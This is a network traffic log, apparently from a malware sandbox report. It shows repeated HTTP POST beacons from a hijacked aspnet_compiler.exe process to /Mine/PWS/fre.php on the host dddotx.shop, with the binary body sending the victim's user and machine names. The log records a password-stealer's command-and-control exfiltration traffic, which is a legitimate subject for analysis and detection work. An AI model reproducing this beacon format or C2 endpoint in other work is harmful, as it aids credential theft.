Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49983	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:05.163805962 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:05.169369936 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:06.083108902 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5r9M1Kxwmp06Tn%2BSlDd2Owuu0bUHoU8k%2FRiz5ZhtRpRS3JjPHDsUjdqsHu3%2B3E%2BKBIgHJdGzmxVVo7xwd4pPU1uVogjD9T9wa96I97M3URqo7YJ%2FqoIEG5aqHd8ePg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada04ae798788-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49987	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:06.226603031 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:06.232215881 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:07.269582033 CEST	770	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hoy8jUtbaNiQogpR7xBYRN4Qxa0WEHg5pB%2Fbg287JQIreEDqJcCElSurkRf0GV3uAseD2m12UdSjD4uWZN43a97I5f1tjz6YVgAxpNsMZVTU7JbisG3dKGWBefZLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada0b5dd94743-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1120&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=105&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49990	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:07.412898064 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:07.418539047 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:08.761451006 CEST	772	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEeWlldJIgJjnVVY0SO26O0TfTmIXckdTrnihdrTBRhuzX5FS4qGcQrLHtrnWqxzo0rzHSNE3%2F24hFuvhLTQGBuuvuXzp5VQBLrVITaxiFBjYN%2B9fsZdePlJbC6d2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada12ba766b82-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49995	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:08.914410114 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:08.919859886 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:11.602705002 CEST	770	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRL0MJ6O1BAFldDScCQCjuc4Np8QFdXGb3rHH6ZGn6EI1HL80Gs5DaDyzC7U2AIQ4EMmyTO%2FIqK92ZxRKrE4ZGRUtAzH4XQq6Vc5xutaG59hKXXjKswA42SkvjP0LQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada1c19a06c62-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50002	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:11.772185087 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:11.777745008 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:15.147119999 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWYQ2w75zgZFo8QaD7WFRpSfrTPXYBuKFIZxHQ5C6gWjGcRe%2FKXfB9LzwVy3hqLZJk8iMsoMUCWYZZhDVRYvHMc7LlKFBh17eYmTvwXK%2B61HMX%2BlbQ8CwXipME7JoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada2dedc56b39-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50010	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:15.303961992 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:15.310030937 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:16.206479073 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1%2B1Q%2Fo%2FG2QnAoJlSM0yAKKU6G3R2R5pGONJQGTP%2FyDAo0sqh5tYQl1FFInBNBi7QAjr599mfV9tHRf1Q1QTjRACFrNOTf85kNB5ENQ6cw2N4bDrZqiZ1%2FGzjSKOzg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada44194f35a2-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50013	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:16.347213030 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:16.352682114 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:17.263499022 CEST	784	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoJF9AMe%2FA%2B%2BSad6%2B3CyNVUbHH0zURWAvWe39GrkE4FOmChe%2FbYIAfXfH7nlf1cIWHiZiVRtoP8EbFR2zcvjEr%2F%2BRDhDqSraZ3%2F33cl7pmmo2sSZsWO37rvzbcxfow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada4a8fd24868-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1398&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50019	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:17.413908958 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:17.420331001 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:18.463715076 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74i3Eu8mrHpb3GPYKmVboas8SY9SUF9ej8%2BmMq1nH8G%2F9I6WLwstdvVHF4LGniTh0f2WfWV70WksH5ZOs2eQ%2FjOCgKdbluf3hEasg2worBmZgOkqPPitMHBQlhltMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada513b2ea927-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1540&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50022	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:18.614675999 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:18.620368958 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:19.665740013 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHkhOwqkAR225TjaaK3%2B5VGRcaldiYXKReieWHLBJGHDB5iu%2BVjX%2FeKTdR4v3fvD68rqTWpBeQJmhv6ACfFHSCvXQ%2B5ENF5abqaEPBDLM6z9K1Ru5e1wanLVRITgQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada58ccaee857-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50023	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:19.824379921 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:19.829824924 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:20.770615101 CEST	778	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjdKh59KaDKOs3aZ5Gi7oN9PsKZ1g9DB23k5SQBKGa288O5VBEyDksfYOwl5pfk%2BQqH8iv%2BQtkd6ZSj%2BZAD04pM873rGSjdktUen6N%2FvsMaXlwTdySB7FLcRlL%2Fssw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada60493a6b48-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2601&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50024	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:20.917121887 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:20.922651052 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:21.809870958 CEST	774	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URi8w8bwwL4koeUv%2FYGuYMoE7NlwBOsfD5HUCry5zBLpeTMEAKVcR8KZabIw1Cl0dUfRj4Zg%2Fz%2B0B9uTn9eHGVT66fLcK8NkORlhi3tQiZSpWZ8x0V8RChRpeV18Qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada671d0b2fdc-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50025	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:21.966496944 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:21.973153114 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:23.173033953 CEST	780	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZAKx2Yw68A5Tn2NQ8gDz%2Basu58%2BVjpuZCY%2BUfRvrZ6FR9lryFYhk39R4K4Cw%2BXnaEkQUA7Ba5u4yBJjk0e5nvnHPdV1FlcWzxP6HL8%2F10HWLt72l%2FAs17MFfFmpPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada6dab6e6b5b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1882&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50026	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:23.319847107 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:23.325611115 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 24, 2024 17:03:24.271332979 CEST	776	IN	HTTP/1.1 404 Not Found Date: Thu, 24 Oct 2024 15:03:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbomeqce6xggmjjX5oK1szsV7VWp%2FZH%2BxF81mAqghIp8ZTsvxy3cz0XKfqgqe68syYxqKu%2BRCKnWAVx3mzmefB8tadmD9V%2FHkS7N6TcLnhYV6as1gphbiukbS5PG6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7ada7618dc465c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50027	188.114.96.3	80	6128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 17:03:24.415819883 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 153 Connection: close
Oct 24, 2024 17:03:24.421551943 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
